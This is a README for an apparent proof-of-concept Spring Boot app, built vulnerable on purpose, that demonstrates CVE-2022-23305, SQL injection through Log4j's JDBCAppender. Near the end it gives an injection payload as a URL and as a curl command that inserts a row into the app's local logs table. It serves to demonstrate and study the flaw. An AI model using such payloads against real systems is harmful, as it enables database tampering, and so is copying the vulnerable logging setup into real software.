# CVE-2022-23305 Log4j JDBCAppender sql injection POC

This is a very simple Spring Boot based application that demonstrates the CVE-2022-23305 vulnerability. It uses Apache Maven, Spring Boot, Spring MVC, and the H2 in-memory database to log one simple entry, taken as a URL query string parameter. Since Log4J is configured to use a JDBCAppender, it is vulnerable to SQL injection.

See src/main/java/poc/ for the logging statement.  
See src/main/resource folder for all the configuration files.

You can run the application using Java and Maven by running "mvn clean spring-boot:run".  
You can also run it as a Docker application such as:  
 docker build --tag log4j-poc .  
 docker run -p 8080:8080 log4j-poc  

The app will be available at http://localhost:8080/.  
To exploit the vulnerability, submit an injected sql statement as the parameter which is getting logged:  
 "http://localhost:8080/?param=');insert into logs values(':("  
The return will list the added log entries, containing one that was added by the sql injected into the parameter.  
To do the same with curl use:  
 curl 'http://localhost:8080/?param=%27);insert%20into%20logs%20values(%27:('